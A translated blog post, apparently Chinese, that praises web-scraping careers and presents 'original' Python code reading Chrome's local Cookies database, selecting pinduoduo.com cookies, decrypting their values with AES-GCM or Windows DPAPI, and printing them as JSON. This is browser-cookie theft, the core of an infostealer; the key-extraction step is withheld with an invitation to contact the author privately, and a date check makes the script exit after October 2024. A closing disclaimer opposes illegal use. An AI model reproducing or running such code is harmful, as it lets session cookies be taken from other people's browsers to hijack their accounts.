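Anti-scraping and anti-anti-scraping involve cooperation within competition and competition within cooperation, and together they have driven the rapid growth of the internet. We now live in the data era: data is becoming ever more valuable, and writing crawlers to extract data from the internet and realize that value is becoming ever more important.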
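Crawler experts are valued by society and sought after by many companies. They understand the old saying: know yourself and know your opponent, and you will never lose a battle. To establish yourself, you need to obtain data through technical innovation and let that data guide a company's healthy growth.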
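Below is a program snippet that I wrote myself, 100% original. I hope it offers some inspiration to fellow practitioners and to IT enthusiasts who want to enter this field. Let us join hands to help our country's IT industry reach new heights.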
import os
import json
import base64
import sqlite3
import sys
import time
from datetime import datetime, timedelta

import win32crypt  # pip install pypiwin32
from Crypto.Cipher import AES  # pip install pycryptodome


def get_chrome_datetime(chromedate):
    """Return a `datetime.datetime` object from a Chrome-format datetime.
    `chromedate` is the number of microseconds since January 1, 1601."""
    if chromedate != 86400000000 and chromedate:
        try:
            return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
        except Exception as e:
            print(f"Error: {e}, chromedate: {chromedate}")
            return chromedate
    else:
        return ""


def get_encryption_key(file_dir):
    # Core logic withheld by the author: message me privately to get it.
    # Placeholder so that the file at least parses.
    raise NotImplementedError("get_encryption_key was not published by the author")


def decrypt_data(data, key):
    try:
        # get the initialization vector
        iv = data[3:15]
        data = data[15:]
        # generate cipher
        cipher = AES.new(key, AES.MODE_GCM, iv)
        # decrypt; the last 16 bytes are the GCM authentication tag
        return cipher.decrypt(data)[:-16].decode()
    except Exception:
        try:
            return str(win32crypt.CryptUnprotectData(data, None, None, None, 0)[1])
        except Exception:
            # not supported
            return ""


def main():
    # print("First argument passed in:", sys.argv[1])
    file_dir = sys.argv[1]
    if time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) > '2024-10-26 00:00:00':
        sys.exit(1)
    # local sqlite Chrome cookie database path
    # db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
    #                        "Google", "Chrome", "User Data", "default", "Cookies")
    # copy the file to current directory
    # as the database will be locked if chrome is currently open
    filename = f"{file_dir}\\Default\\Network\\Cookies"
    if not os.path.exists(filename):
        filename = f"{file_dir}\\Default\\Cookies"
    # print(filename)
    # if not os.path.isfile(filename):
    #     # copy file when does not exist in the current directory
    #     shutil.copyfile(db_path, filename)
    # connect to the database
    db = sqlite3.connect(filename)
    cursor = db.cursor()
    # get the cookies from `cookies` table
    cursor.execute("""
    SELECT is_secure, is_httponly, path, host_key, name, value,
           creation_utc, last_access_utc, expires_utc, encrypted_value
    FROM cookies
    WHERE host_key like '%pinduoduo.com%'
    """)
    # you can also search by domain, e.g. thepythoncode.com
    # cursor.execute("""
    # SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value
    # FROM cookies
    # WHERE host_key like '%thepythoncode.com%'""")
    # get the AES key
    key = get_encryption_key(file_dir)
    return_list = []
    for (is_secure, is_httponly, path, host_key, name, value,
         creation_utc, last_access_utc, expires_utc, encrypted_value) in cursor.fetchall():
        if not value:
            decrypted_value = decrypt_data(encrypted_value, key)
        else:
            # already decrypted
            decrypted_value = value
        # print(f"""
        # Host: {host_key}
        # Cookie name: {name}
        # Cookie value (decrypted): {decrypted_value}
        # Creation datetime (UTC): {get_chrome_datetime(creation_utc)}
        # Last access datetime (UTC): {get_chrome_datetime(last_access_utc)}
        # Expires datetime (UTC): {get_chrome_datetime(expires_utc)}
        # ===============================================================
        # """)
        return_dict = {}
        # is_httponly, path, is_secure
        return_dict['domain'] = host_key
        return_dict['expiry'] = expires_utc
        return_dict['httpOnly'] = 'false' if is_httponly == 0 else 'true'
        return_dict['name'] = name
        return_dict['path'] = path
        return_dict['secure'] = 'false' if is_secure == 0 else 'true'
        return_dict['value'] = decrypted_value
        return_list.append(return_dict)
    # commit changes
    # db.commit()
    # close connection
    db.close()
    # return_list = json.dumps(return_list, indent=2)
    return_list = json.dumps(return_list)
    print(return_list)


if __name__ == "__main__":
    main()
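The `get_chrome_datetime` helper above relies on Chrome storing times such as `creation_utc` and `expires_utc` as microseconds since 1601-01-01 (UTC). A minimal sketch of that conversion, plus a conversion to Unix seconds for tools that use the 1970 epoch, might look like this; `webkit_to_datetime`, `webkit_to_unix` and `WEBKIT_TO_UNIX_OFFSET_S` are hypothetical names introduced here for illustration, not part of the original program.

```python
from datetime import datetime, timedelta, timezone

# Seconds between 1601-01-01 and 1970-01-01 (369 years, 89 of them leap years).
WEBKIT_TO_UNIX_OFFSET_S = 11_644_473_600


def webkit_to_datetime(webkit_us: int) -> datetime:
    """Hypothetical helper: microseconds since 1601-01-01 -> timezone-aware UTC datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=webkit_us)


def webkit_to_unix(webkit_us: int) -> float:
    """Hypothetical helper: microseconds since 1601-01-01 -> seconds since 1970-01-01."""
    return webkit_us / 1_000_000 - WEBKIT_TO_UNIX_OFFSET_S


if __name__ == "__main__":
    # The Unix epoch expressed as a Chrome (WebKit) timestamp.
    epoch_us = WEBKIT_TO_UNIX_OFFSET_S * 1_000_000
    print(webkit_to_datetime(epoch_us))  # 1970-01-01 00:00:00+00:00
    print(webkit_to_unix(epoch_us))      # 0.0
```

Note that the original program writes `expires_utc` into the `expiry` field unchanged, so that value is still in microseconds since 1601; whether it needs converting depends on what consumes the JSON.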
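In more than ten years of working in IT, I have witnessed and lived through many stages of its development. 企** and 天* are both applications built on scraped data. Many e-commerce companies also scrape the publicly available data of e-commerce platforms and analyze it, identifying best-selling products by comparing prices or estimating 24-hour sales volumes. In short, data is extremely valuable. Everyone is welcome to step through this door.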
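Solemn declaration: I advocate improving one's IT skills through diligent study, and I oppose using technology to attack other people's servers or to obtain data illegally. Let us study hard for the rise of China's IT industry.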